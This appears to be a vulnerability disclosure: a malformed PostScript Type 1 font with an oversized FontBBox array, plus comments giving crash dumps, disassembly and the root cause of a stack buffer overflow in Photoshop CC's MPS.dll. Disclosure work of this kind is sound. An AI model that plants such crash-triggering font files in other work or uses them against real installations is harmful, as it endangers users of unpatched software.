%!PS-AdobeFont-1.1: CMMI10 1.100 %%CreationDate: 1996 Jul 23 07:53:57 % Copyright (C) 1997 American Mathematical Society. All Rights Reserved. 11 dict begin /FontInfo 7 dict dup begin /version (1.100) readonly def /Notice (Copyright (C) 1997 American Mathematical Society. All Rights Reserved) readonly def /FullName (CMMI10) readonly def /FamilyName (Computer Modern) readonly def /Weight (Medium) readonly def /ItalicAngle -14.04 def /isFixedPitch false def end readonly def /FontName /CMMI10 def /PaintType 0 def /FontType 1 def /FontMatrix [0.001 0 0 0.001 0 0] readonly def /Encoding 256 array 0 1 255 {1 index exch /.notdef put} for dup 11 /alpha put dup 12 /beta put dup 13 /gamma put dup 18 /theta put dup 21 /lambda put dup 22 /mu put dup 25 /pi put dup 26 /rho put dup 30 /phi put dup 58 /period put dup 59 /comma put dup 60 /less put dup 62 /greater put dup 64 /partialdiff put dup 65 /A put dup 67 /C put dup 68 /D put dup 70 /F put dup 73 /I put dup 77 /M put dup 85 /U put dup 86 /V put dup 100 /d put dup 101 /e put dup 102 /f put dup 103 /g put dup 110 /n put dup 112 /p put dup 117 /u put dup 118 /v put dup 120 /x put dup 121 /y put dup 122 /z put readonly def /FontBBox{-32 -250 1048 750 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337}readonly def /UniqueID 5087385 def currentdict end currentfile eexec D9D66F633B846A97B686A97E45A3D0AA0529731C99A784CCBE85B4993B2EEBDE 3B12D472B7CF54651EF21185116A69AB1096ED4BAD2F646635E019B6417CC77B 532F85D811C70D1429A19A5307EF63EB5C5E02C89FC6C20F6D9D89E7D91FE470 B72BEFDA23F5DF76BE05AF4CE93137A219ED8A04A9D7D6FDF37E6B7FCDE0D90B 986423E5960A5D9FBB4C956556E8DF90CBFAEC476FA36FD9A5C8175C9AF513FE D919C2DDD26BDC0D99398B9F4D03D5993DFC0930297866E1CD0A319B6B1FD958 9E394A533A081C36D456A09920001A3D2199583EB9B84B4DEE08E3D12939E321 990CD249827D9648574955F61BAAA11263A91B6C3D47A5190165B0C25ABF6D3E 6EC187E4B05182126BB0D0323D943170B795255260F9FD25F2248D04F45DFBFB 
DEF7FF8B19BFEF637B210018AE02572B389B3F76282BEB29CC301905D388C721 59616893E774413F48DE0B408BC66DCE3FE17CB9F84D205839D58014D6A88823 D9320AE93AF96D97A02C4D5A2BB2B8C7925C4578003959C46E3CE1A2F0EAC4BF 8B9B325E46435BDE60BC54D72BC8ACB5C0A34413AC87045DC7B84646A324B808 6FD8E34217213E131C3B1510415CE45420688ED9C1D27890EC68BD7C1235FAF9 1DAB3A369DD2FC3BE5CF9655C7B7EDA7361D7E05E5831B6B8E2EEC542A7B38EE 03BE4BAC6079D038ACB3C7C916279764547C2D51976BABA94BA9866D79F13909 95AA39B0F03103A07CBDF441B8C5669F729020AF284B7FF52A29C6255FCAACF1 74109050FBA2602E72593FBCBFC26E726EE4AEF97B7632BC4F5F353B5C67FED2 3EA752A4A57B8F7FEFF1D7341D895F0A3A0BE1D8E3391970457A967EFF84F6D8 47750B1145B8CC5BD96EE7AA99DDC9E06939E383BDA41175233D58AD263EBF19 AFC0E2F840512D321166547B306C592B8A01E1FA2564B9A26DAC14256414E4C8 42616728D918C74D13C349F4186EC7B9708B86467425A6FDB3A396562F7EE4D8 40B43621744CF8A23A6E532649B66C2A0002DD04F8F39618E4F572819DD34837 B5A08E643FDCA1505AF6A1FA3DDFD1FA758013CAED8ACDDBBB334D664DFF5B53 95601766776D4F09024EFFA59E6176AFB1FCA154B3072BAD4FAD58611DC4B5FE 4721C679FD0C9063A7BF16271BA4CF88836178B315E214AF2E76F4ED9EBFB02F B3C30D8F9F808B3F10D07C1C026C616BA3BAF6EA02CD9927FC4989F34D38C5CF B92F377658A321DFA315C68F3C463DC43A121AE6697522A243577EA2458E7A3E 50AC38BB2E65435F1C3C311B913C770B51CAFDE0071F399D0959D114BCC91997 F5136F6EABB32E1A435FB41F6B66C0B2C43882130630853AB9DBAFA018613B1E 8E53108F13C412AE5FDF5AE811328D61E0C1C23D0444C22690AFF5A4AFA2B0E3 36346A889395C7EF5777D9C5D2C22725A7AF54C83E0DAAD2CFFD74BBA7DC3E97 B6796437DE4E5569DFFAA1C0606E1AA3F0566423EE321E796057C7158872F6DF C7BD781403B42FC231A40A5809F20DF2D337D2AEC64782702CE4063FB4FE1CBF F64C03A73EA8625C9128338FB33E1B34562A74C7E302498FA354ED12CDF0955A 502F41AB757B4702D56EC0997D6F98EF5443FE6602210ABAC3A9FCD64349A179 7D1ECB8E55BABC40E53772DB6E58D85885FAD1A1497A32D7D207CE19F798EA0E EAD9F4EDCA1EC761B5A0D8760B8C4F3662261BC429928C8F88970DD32A557B8E E49502689ED399250B6C012D4432BFA199FF2737DEE17AA1E32BD23E40887516 
F9A848EDD36EC34B8522DFAD0996CCC9557839E16F06F345CD3575BFC8BC6BE6 6F5A1BF8CC94DEFD461EFCB02682BB95CC7ACE3FA52740F371D7EB9CA00A72F9 3DC5F5186517E36EBED8E26D9639265887276FC555C55D1855175888FEB29D0F D54A05DCEBC8D1B423E0D983498F13851E6AC1A4AA0F374E2EBB0F671F1AA1A8 6A928816724CC9EB0A32F867D720BE7E0063B0CE205D51CF9916A36B9FEB3321 61EDD65520211F3DA17974A7DBB8FFBAAE6ED30516A985328837E5BCDADE6DD3 3966EFF786B5D0EF721D73501E3C7B575739C2A83863FEEA2763CFA8F21F42BB 8EF9075EA5902DF84DC019D818182AC0A5B1AEB6E575917953D22CC57D655142 63ED835BC8BFE7024C4DFDD441B7DD937AC1E884459F71436809079DF4FF6471 CD92BB75068ECE0379DFE2DA66A52CE74A875B1A3EBC3429E94C20F5C372809E 0751B3DA252B4BCEDD402F1EFC10C5C22C642F6C82C091D58A0F212BD1F6AC5A 544F5712FF4272B90C80F18003A83164F676D7248A5B11A8769BED8D8D535B8F A3346942A4FECF593795F576329EC7DDF79E53FDC52AB909336957FB2B3DBB23 F605780047C55B0BE6A6F6F0A58670641CD809E23040EC8940E8CA6B309733F0 0D06CCDB2DF7F48CD902B7BE149E7C5F73081851BF8C1EFC945D4CCF5D7DD685 B98E9E4D6F16A9F74CE384A39A63B9EB386442FB18E1D39906579CE42B942189 060367EE51DF6342993E68B90F506A7037A2B548B25CE07AA0B2D3132F1EA0B0 E2BBF3DAA9F9D0A156C28C333C85392556A1B4679326938B12128D35134245F6 F271C1B858E17D0FEB0E99B659121B3CC0FA3A7FA1E6DFF4B4F5337D1CC84067 11EB01A0CDBA65913A507D1604C8482B949F4A71EA4735323254184367FB68B3 B9A3AC611C0B62C4C97A1007B70F3019F62F164D22C419540222E8D033C7F628 115B031F2E7EEF8AEBB7D520EF6D1C61CA2505E16B4855AEF44955E1A4617E92 0CB97633A6F7362E65A3C04BED154AF88E3A6D64960BC019B8F1FB107D7904A8 2FD80DA6F6A857391DC28231BC0EE4AFEED8170CDF8F9B4B77829205BD5CA122 58EB0FD25CC99CEB8BFE56A69FFD22362BDD2634B39FBD96901F1C123392272F 05FB33298D44B8E416A12BC5B53173048C32BFF6F29C3BDC4213988044A908C9 6B9A1ABA9C052C4DD57AB177C3F5692D438C73D292DF33BC87428F982ECF4DAA 5C6399FC9B62A48B6878425CE558BF2A302B91D26D213E8BA528C3452A7E1F06 643933DCAF5D4EB1429B229EF61BE9C76F1EBC051CA010E3A4FE26D1F855B022 F0285B91C35504FF12FF98E3DE08792274788B6993C1459A0164F6C31283B43A 
B618055F526AF15C85FF493EDD36DF6B48AAEB2EDBF509580D147B4BB615814A BB0A080890BF112C295C04D99EB9D3F257B2DC63023DAB01AC9437F2D6025ED4 84FEEC7AAD1D77E0D3CD6ECA6EDD92FF5C9EF7C7916F04688EEB42A4ED977F71 D590F50D7BF5A76AEBBD65DFD00A8FBEAFB269A76994E10F2FC09EB34E017040 2A56CDDDD39E7A9FDC5814ED74469C55B215B72824FD598221776781EC6E98EF 6511319BEF631C5E21343D9B44AA12A56B326FF62405C146B50C0D8C13CAE9E5 514E9192B048E2AD6E638A6BBA54407F2876E3A2EC9A37BE5A35309D8CCE9E47 272B140706E9BCA0C21F38BF77A5BD2B5BFB6FED766B87D311E86A9AA011ECF1 906C8745F3CC14C79453EB5E2BDDB347F3B1DFD0DFC3BAE0F71707933221F95D 9CFC22E71B8863B5F79487D0EA516FBDBD8B7AB8815D6B0928969610186DE799 020A0B1784AEF18E5203ED3C6BE2157FD93A4DFC703C5737F484B9E7E3264DFD A7962CC849E0AA847866EDF8C4693C9FA53C7AB90C76EDB5988BE2AAE637D4B7 390E6FD502C5F89AEC3B7FAF59D986B336FD3751F2B29784D22D7C99190F913F 9263123EC9A3DE68B2993CAD3DAAC25B677A11D1C4491388DF0F41ADA0B57FA3 63486027C0F91487D827C28AEB37902CA7A823C0D8761F4E072DEECD0F6399EC 0F9E8CDA826915F3A874F90ED0317D89E083925949A7A8BA2A3DA3429F102192 0CCD7F04CCEF77E05ED8DEA13B1660D5B27341E54336F800E7D91EE3F6260556 6A89A00BC302C9F1DB453C2EECDBB83FF01B31590684C6AFEA1DB2303200DA22 3C5FF42DDB3909902F136E5B1FC36B1546EBE35F61B3ADF2942021B82422A816 BAF81FF8EBD36E930F46FEE018B66FE1DF68411DE51606DC9612D84445D99080 1C6EC632D71E8A7742F4C434BED02D039A144BBB85D96D994F224EBAFA3CB681 C9769B944B142C44B3523955393ECF3A76B432D9E6A7B724425D5CBB32C83219 A9BA3454C6EF6529A5D86DC2965DD2972F68DCA73891F5A7347CD9D60581415E 762FC3F51D7DD5E8FADCA307859F22099EBC2C0DDA7C72FF9FB047151B9A5230 5D883DC944B5CBB1B476FB9AE166B8D76B1CC0F4192594B552F5DDF187C70F68 19E8B302FB48A99F8782BEA0B72BCE2CEBDEDB0EEEB7C409E2439932E9D6B554 38D6A9FAB99F70064612C512B02FF9E3A40DEB6B5DF2B054A583E4F1BA085974 803F59927818E6D29465F5AF3D14396FE3C161523BB7992F70DC85E047425828 F099A652BC5598A5925568D96023F83A8190000F4D420FE25CFEABF008487F0E 55D6B4415ACFF920D810BAD4B4C0F4F2F5A5E83C7AE50A942FA0092F03301739 
C5DA47D39B4D7E1FA16AC67D4C1231CE8159145397A129B2166BCE09E4307C25 3BD05756CFC9488F4EBADA907C66FE06820BD36ED8FA50EBE291C40630B28F37 9EC9001E847C48F4EAC0B5364EC61863CCA30B9BF541AF3844F44F24E9B5A91F D459BC9E61EBFE040F29263E81D25ECEDF9992C58B008F8596F777B95E326C9D 4391F49F0BB65A8077950A2A0EB59C73BB183C056458642158514EF13EA65B82 2BC164ABE1966AEB3014F76C7F25D1E312D614B3F6357E6D956304E1DC5121FE 97B99E88483CF579916DAD9BFCFC12090F23C1CC67BC61529E097995435F43EA 94E1D5753E8D33946148D9A966356A89550439F8E15AC75AFA8BBDA4810BF57A 7B98CB8DF0DBADB5E7C014E3F65F3C8DA035E7CC10CFBA4A6885ED72EEA5D298 11D25FB508997A4CFF88CFD15A958D93AFE2C59FDB2B35F45B08D9AA58B56412 571789F2F8D428727F1A68169387A331236C059FA778EBF87D54C97DBA99EAF1 E676A60FF189E43AD665653DA394032EF4833DC62A3BFC4B617A01E06B204440 E16942FEB1299D4B7CA68DF0DF6612256A1EFE17875D2568F19F0490BC92904A EE6B6D0F3B8D8854BFC42AAC19FFE981E6F2518718A32242A0011CD1F7BB99F2 06A895181987934B7E25A53E509E2AF034C7389DF733C2F011623E1D797AE264 AC0DC7A6DA91876F5019FD9650EA3DE1FC9DEF4285E535EE9310355450F7E465 2967CCDCCEB70F5CF237275FE7B509F208024937F61B2985F7E1C24F34FA540B 55B7237CE79AF6B90E1C481D4D8639AF514C945F40572E70BC88E07552857807 7C91CFFED2C4D4EE5C054A8C9E35AF6216AC7F127B5A4C4B871BF27F06166820 37D4972502DCC662FD5D98037B3251ED782C9448AA3B2AF8099541B927B35401 E3A2D1D12336C049784A3F1F30169FE473E4F2D5E03124D6F13E4E06367D2FC9 5FE9886A0C9DE7655AD9AC2F2B8F43002FD2B41A8D8FA2D7B8AAF2BD6E54AE94 C6D24CFDBA23AB82A9905F80CEE259EB52A3F62026E862D35C1939190427CC6B FE92985C53273501683BB0B2AB312FF4BF42E7D7304F45DBABC19B5BFC73BF6C E4EE7408CF574EC875279D9BBC0B4ED8B7A495C28D5AE530C0C76E9AA4F9B8E3 234DCC414B97213A63CA6293E3E3F9864EDEE04A2DA00A6628A41480DE82AE8B 22AF0C4E442B07D7B9BFBC5ED574C86DC774C9D21D9A54F2AD2231F62E35ACCD 5B564AFB52EBFF773124311B4F83A487199BB74D2F8F22A9D8E4FAD5C0E4D0C3 953CF05C519AF3A50F8F85B2B17BEE0EA8B6D068B37B0C5DA517440E55FE08E2 B16B18D5CBD86B7FB4F208F8B7420AB30502B15EBCCF5CFA4E6F01CB062FB817 
1198F19F80FF084A48A9A946E20C415F73F20DB21A71902536BCDE24D0CBAD77 16D9B3C24492FB516A77BC1D55DECD497EBC1439BE4A5A38A9D9925571233213 B5632D52756153D6777282A3303BC9776BBEF1A9F36FC184057531102E18BE77 9B524ECC856DCC6B4C15857B1108C06C5B82D1490096C1E87EEF58B9F4A2BD93 5EDB3BCB50A429F05AFFC4E0EFFF5B15058E1B8CA0C9B7D2EB8F2767234A7DD8 B527E2947B942017897E7A42053DBE4473532F57D1510DDEB688CCB9AF2F12EA 107C309E5C9A73E2C4C35193A5DC3268B80374CE36B9157DA49AFA73CE80673D 6DCFB540F6827C1E7105B4BD29C431FA781DDBF43FE7A6F1AD554B0ACE1F6DC4 37779B83CC8A7E921AFC2D9064B50375A59F8DA19DCAFC1E70E2BCF4E81D58BF 116657D199174B411D88FE6A41A9A9ED1AA6FAB9591F74F69DA6447A076E887F 8955F24164C30A897993682B067DF80BAC33D71C80A600893CA17149578DB558 83A7697357FAE2B131E094576638C8B9CDAA0A7E7842F07B23D8034940491005 D38F29443FFF0D9207A33B52AB5F520B543EFBAED92E8C1B59D04F3323EA4130 3F40CBE99A5CC7EF434408926D652EDD716CFF362D3F2156761154C2C39F515D F26C1B55A58664026B71A4D66465189815CDA838D6147047096BC39DD5BAA3F8 5176DEE7C21742A862554DFDDFA1DF580D7E8C6DFAC12AF5800CB3706C75D303 61A000D1711E940897170248272903CF558A3B9EED332688E5D8EF3C9EFA3B3F 905AD4B17DA41C12FE946FAD2AA9A86A77D23CFE6803ABA70C3930D04E8F85BD D3D579205094FECC8CD28914073DF874017E59320F25E4719F0E7511F893FF38 7CE056055CD3DA069BA13E0674A4DFD17ABDB2544B306DE54E4FA0CDE5691385 4F727AD76B04096D71B65B9E0FF6224B4C8AF185D040409A0DFF89FE13A5594E CCC593A8689D874199F669DA127BBF70DBE4424B94C810F843773BE522EBE845 7558E59ACAFF17F1168D14339C6C9CA399251ACD0AB723A38DDCD69B01477004 BBBA575044CCBA1477D9DF8E0EC834C0E2882D7138A7ADCF73C2AD284037716B F31144CB8FAA4E33B822B903051BA236705926A7038E9E1EBDD5E21D5CFCAB54 A83CC6764ACC0AD8496171E05DD0A5896B73576071613F883A995991FEDABCB2 2ABCB59DAB634426AC405C045A28893547039989419BCE2EA708BFAA12697950 8F39C032BFCCDDD98AFFE165E46C86BA87898118F2119EA64CC87FED3E796784 B12A11F54EC6ADD7C51A2C92EEB0FD26AC7281C9175A92CF75BB6A8DA3EAE9B1 49818CE6136319718B88EEA0B7806767E93C19781F9A9DF64C8E81AAE85CDB76 
FB5495BED3AC88DDFA16859A40CE8CA8DEA4493648D34A1350CE9086CA5A2A7C 0AF66A6876D67D465F16DAA74D241B80384C18611AE0CBF6041412DA0BA41AAA CB9C2ED3FB0F085A0624BC0EC6D85CDCD0001BE6C617742592648D22905387E0 C167E293199E781E7E09D39C30D2DDA89A80E016E2BDAFB4EDB25044E8B7F0E6 A1F3F063C9D00843F00263A6711349A4D99D8D75DC852C76ADFF27E2E40643AA F92BB033FC966C7359C2514C10E287EEBA8916C35F363008F8C1363AE7D7802E 7AF2E4D8E957C81839A368F93D336595DD2DEB11D546F042E8C21F0605B7545A CE368069FB9726D1F977AB2ECF4BA189CEA5F1293CA87CC565CEC82923D30AE1 5B38E1921B2AF3106E586AA9605A1EB85224EEC3247F9B65AE7B9610197B0103 844F1E75E340963974F2EDEA1C1478483E8FE221D2DAD0F881BA6B4E8AEC083E CA2CAA72767BB6A32FE8E209DECB743510677954945A79D458B921786CAA6FBB AA1122145FE19A650D8064D5560C8AA267F6E285638AC2B345B074B4A68FC935 7BCF6DB898249A703323CF4D1D18D0B01ABF64FF8A562BDE28A9B65D70297EA2 38ED03F1E6EFC7F87AEDEB09B329BFC093390A840DF50E6CCE0EA6D124919B16 6BFF042944CC8040045EE709292CE98C591D71603FF263FBBAF408488F5A734A A01218D8936863745FED46C5285B25D7306E52029464FFCFF9502AE8E6248A8B 6F8CDAD5FCD5C961890E2350176B00E1E34F42C136D6F2CF1F69F2A79AC5B630 18A61F259FA7689DD0E32DD6415E70D5728192015F94DCDDE14F859BBC120543 DC625507D3F2098275D87C431312C437EA611D822AF090E647FC1AA949A150F3 6FBEC872DCB2756AAA2D5791B3FCEE1E52D2E8D177C3E69BD6E55F1FC285B1E9 319D48B687AD658DCA06D6CA16F7D192A6E89EF4CC741550187C5B1360C5917F E993D4A32F299F49C0FDE38E518C2D93AC970D40165F29F6A42AC3AEEBDDA6CA DD860CED28678B01DBFEBBA7532935779C9CAADA665239134CB421D16F4D24B1 486E4F4946CCE1FB5D8994ECB3F2FB853D427D7979F2D1D6CA1653B6EBE32064 AC12A858EDA4036B843B1C79B300AB5B6560E8E838ACE3F49240918035F2FE1E 62A233DD1B911F1C7D551AF5257A21BF66885417A2BFD24B06B9601303BFAA3B 7281F95C8B40B67FB77626A4EA87248551F3E2B001CDE9BFBEFCC730E1E18D48 43532F155E276BF9A7CA8407F5FF84A264FDFA49DB9D495BAA53CC65F765CAE0 8ED159C596B94077ABC413DA4472398DE11B17129811CCAC2BA48668F64A0243 E17A9D0812A4BD5E38DF12BFA2838E66A17FB87F20D46CC17C562F8DC1023C5B 
714D85277B4D9FFB71EC008CC41A16A098DDE8F9DCDADDF14A3F4DAD8657B7A9 201846536E41B9934FC8633A65A849B820FB2E51EE1CD6F53A50E0023139D987 809C492E5BD3B3879B8A7543F1C4CA7972B88E45EB94BF8085E0C0CB5EA1D204 61DA73DACFDE4CC741119564936D651D0A0B790078C4B229F776C0CBF217CC7B 08C18E399DDD846773CB5B9F7A1F39DF6EF5B83D85718F162B577D4279E05856 0774CEF8E47C5EA77AC016939330FA1A51E1E2E100A9665A1DDE8410DD413745 0F5244B940250B61830480E8F563FBAA6E4CB2DEFC82162B1A8C09A5D3F470AF 959558B7B075E951332B53A2069070880EC3040DE22159F9B6F48355C1B2D270 CFA741C46C218D62C04D54519224A485742979F50BD45011E05F04E2F594CBED 1B0D411A7D2587870C6FDCF7AE4D1E408BF6B66D6B826A427BECBEF55D82DDDD 50FFF1C1962D6F2D81FB050B60CC6AA74B7292A16426CBB565615BF60A881A9C 9DB9A8FFD937F8B0EFCB0F992927FC59B78B45C545CADE2A54791E3DBA3E9F0D B6BF14499D4C0C758CBC09037AD3828689404005FA2DD419343EA6EC91128B61 4C5DA0B792FDCC0B248D5853BE2E1EB9A51418E32119B35332A3A714A13A2E3A 390B24D212B070338F3F0F240E5F8864242741EAB379B90966DE283524DE1D4E 91F6FA3128AE5485837F8949CEBE18A51CE9AB4479B98D226A735EAF763E7FE2 732205EACFAB5DC84E57D6788178A88ECB99D69520FA5271B04B5C8497FD3992 B207D771E7BF8E3AECCAE0C723162344AFB005B4EAB4E92A9ADDA0A7542FAE67 09E022138177A1229FD4B62B987CE1E70DD0F904DF6A46FC4C09A703B873507E C931B366EDC69DA8401AF65333F2168458CE140303DC56E25F5B516C64798977 FEC0CC3F07CD63AF3C46156C30A1D36FEF6CFBC31FFC4B49016DCE533F925D3D 50AB23AA654B70139D87BFDAF13B810D4EA6AFCC857259D25C8B4A3C02B57380 2BEEFAA6C1856F93BE103A2097591F5E19552ADA91C34C7BF4772935995252A2 2E0D6A6BA227BA050ECB30AE857DD6DA3963D2E10E5873FB5E8D9A9FFD642621 3BBAB4058D700FE50E4B012C9AD470EF0198CFDCFCC6191EEC3C26E97B901E2D 1CA5B455D0EE03F7E09735D5947528D3AE28063734D399ADB94D42532E906D7A 7E23EDB3B94A88D595209CA6EE0ECD896A1F23FB7EC5EA1E2B44874A9E6CC09D 5FDDE84B57A5F26893A11D5A56567F5589711D12FBBD0FDABC04AFBE382F24AF 094B1ADB336FCC8F6D6BE86E8A03CF4351C57AA513382FA1BA91A24E55F2CC16 97AF3CFD1EFBD4E111090D1FF0E4270F7182BD191D289C53783F05156FE4ACEC 
9C7E9D4467ED6852E4D897AC05AA2FAA72ED0BB01DF92E9257BAEAC5E19F80EC C24783BE097FC3A9B36D87806B5E9F304622FFC6A7F9B553381EEA0607AAFFCF 1322085B99B8D899A0176557103EDF0BBB5368470680E73132E13F8ABB509F2B EBA0C0F7F10774225FC75D1B2874F9330C204EDEC05240519C6F71C871C6535D 6CF8A3B3F785961747130EFA5711B59BE7F459CA09870794DE44D32E1305591E EAC44E3BF81642ADDE6B866A3B8E90B067BB2B45F85AFF8F9211CC300F2DFCF0 B973741EEA854E 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 cleartomark /CMMI10 findfont 12 scalefont setfont newpath 50 700 moveto (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%%^&*()_-+=) show showpage % Adobe Photoshop CC Type 1 Font FontBBox array Stack Buffer Overflow Remote Code Execution Vulnerability % Summary: % ======== % A specially crafted postscript type 1 font file can trigger a stack buffer overflow via a crafted FontBBox array. % Analysis: % ========= % A large FontBBox array can overflow a stack var and lead to a stack based buffer overflow. In this example, I supplied a poc with the following: % /FontBBox{-32 -250 1048 750 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337}readonly def % Debugging: % ========== % STATUS_STACK_BUFFER_OVERRUN encountered % (133c.850): Break instruction exception - code 80000003 (first chance) % *** ERROR: Symbol file could not be found. 
Defaulted to export symbols for C:\Program Files\Adobe\Adobe Photoshop CC 2018 (32 Bit)\MPS.dll - % eax=00000000 ebx=503aad2c ecx=77a2e4d0 edx=002abf0d esi=00000000 edi=002ac8cc % eip=77a2e34d esp=002ac154 ebp=002ac1d0 iopl=0 nv up ei pl zr na pe nc % cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 % kernel32!UnhandledExceptionFilter+0x5f: % 77a2e34d cc int 3 % 0:000> kv % # ChildEBP RetAddr Args to Child % 00 002ac1d0 50126724 503aad2c 002ac50c 5012682f kernel32!UnhandledExceptionFilter+0x5f (FPO: [Non-Fpo]) % WARNING: Stack unwind information not available. Following frames may be wrong. % 01 002ac1dc 5012682f 503aad2c 00000012 002ac224 MPS!MPSToAGMColorSpace+0x12274 % 02 002ac50c 502556ef 001b2493 45a2b7ec c2000000 MPS!MPSToAGMColorSpace+0x1237f % 03 002ac594 5012a452 00000001 01002092 459948bc MPS!MPSCT5NewServer+0x7957f % 04 002ac5e4 5012a6de 002ac720 00000000 002ac8cc MPS!MPSToAGMColorSpace+0x15fa2 % 05 002ac614 5012774a 00000001 00000009 00000000 MPS!MPSToAGMColorSpace+0x1622e % 06 002ac64c 50352b4a 00000000 00000002 00000000 MPS!MPSToAGMColorSpace+0x1329a % 07 002ac680 50352855 00000003 00000002 00000002 MPS!MPSCT5NewServer+0x1769da % 08 002ac694 503532cf 45a0cc24 0000000c 00000000 MPS!MPSCT5NewServer+0x1766e5 % 09 002ac708 503537a2 45a0cc24 00000010 00000010 MPS!MPSCT5NewServer+0x17715f % 0a 00000000 00000000 00000000 00000000 00000000 MPS!MPSCT5NewServer+0x177632 % 0:000> !load msec % 0:000> !exploitable % !exploitable 1.6.0.0 % Exploitability Classification: EXPLOITABLE % Recommended Bug Title: Exploitable - Stack Buffer Overrun (/GS Exception) starting at MPS!MPSCT5NewServer+0x000000000007957f (Hash=0xe6ea5d40.0x979b8c29) % An overrun of a protected stack buffer has been detected. This is considered exploitable, and must be fixed. % Static Analysis: % ================ % The /GS exception reported above is a stack-cookie check firing: the prologue below stores ___security_cookie xor ebp at var_4, directly above the 0x10-byte buffer at var_14, so the cookie detects the overrun only after the out-of-bounds writes have happened; it does not prevent them. % Since the overflowed stack variable is a local of sub_10165500, I'm marking the bug as being in this function.
% .text:10165500 sub_10165500 proc near ; CODE XREF: sub_1012DE70+396 % .text:10165500 ; sub_1012F0D0+1FC % .text:10165500 % .text:10165500 var_1C = byte ptr -1Ch % .text:10165500 var_14 = dword ptr -14h % .text:10165500 var_10 = dword ptr -10h % .text:10165500 var_C = dword ptr -0Ch % .text:10165500 var_8 = dword ptr -8 % .text:10165500 var_4 = dword ptr -4 % .text:10165500 arg_0 = dword ptr 8 % .text:10165500 arg_4 = dword ptr 0Ch % .text:10165500 arg_8 = dword ptr 10h % .text:10165500 % .text:10165500 push ebp % .text:10165501 mov ebp, esp % .text:10165503 sub esp, 1Ch % .text:10165506 mov eax, ___security_cookie % .text:1016550B xor eax, ebp % .text:1016550D mov [ebp+var_4], eax % .text:10165510 mov ecx, [ebp+arg_8] % .text:10165513 mov edx, [ebp+arg_0] % .text:10165516 push ebx % .text:10165517 push edi % .text:10165518 mov edi, [ebp+arg_4] % .text:1016551B test ecx, ecx % .text:1016551D jnz loc_10165621 % .text:10165523 lea eax, [ebp+var_1C] % .text:10165526 push eax % .text:10165527 mov eax, dword_10351CA8 % .text:1016552C add eax, 670h % .text:10165531 push eax % .text:10165532 push edx % .text:10165533 call sub_1021BA70 % .text:10165538 add esp, 0Ch % .text:1016553B test eax, eax % .text:1016553D jz loc_101655F9 % .text:10165543 push esi % .text:10165544 lea eax, [ebp+var_14] % .text:10165547 push eax % .text:10165548 lea eax, [ebp+var_1C] % .text:1016554B push eax ; size 0x10 (4 elements expected) % .text:1016554C call sub_1010DD40 ; stack overflow % In sub_1010DD40, we see the following code: % .text:1010DD80 loc_1010DD80: ; CODE XREF: sub_1010DD40+76 % .text:1010DD80 lea eax, [ebp+var_10] % .text:1010DD83 push eax % .text:1010DD84 lea eax, [ebp+var_8] % .text:1010DD87 push eax % .text:1010DD88 call sub_10260BD0 % .text:1010DD8D mov eax, [ebp+var_10] % .text:1010DD90 add esp, 8 % .text:1010DD93 and al, 0F0h % .text:1010DD95 cmp al, 10h % .text:1010DD97 jnz short loc_1010DDA3 % .text:1010DD99 movd xmm0, [ebp+var_C] % .text:1010DD9E cvtdq2ps xmm0, xmm0 % 
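.text:1010DDA1 jmp short loc_1010DDA8 % .text:1010DDA3 ; --------------------------------------------------------------------------- % .text:1010DDA3 % .text:1010DDA3 loc_1010DDA3: ; CODE XREF: sub_1010DD40+57 % .text:1010DDA3 movss xmm0, [ebp+var_C] % .text:1010DDA8 % .text:1010DDA8 loc_1010DDA8: ; CODE XREF: sub_1010DD40+61 % .text:1010DDA8 mov eax, [ebp+arg_4] % .text:1010DDAB inc esi % .text:1010DDAC movss dword ptr [eax+edi*4], xmm0 ; stack overflow right here: the store goes past the caller's 4-float buffer once edi >= 4 % .text:1010DDB1 movzx edi, si ; edi is the counter % .text:1010DDB4 cmp edi, ebx ; ebx is the # of elements in the array (taken from the font file; this loop never compares it with the destination size) % .text:1010DDB6 jb short loc_1010DD80 ; jump back into loop % Root cause: the copy loop is bounded only by the number of elements in the source array, not by the capacity of the destination. FontBBox is expected to hold 4 elements, so the fix is to reject or clamp arrays with more than 4 elements before this copy.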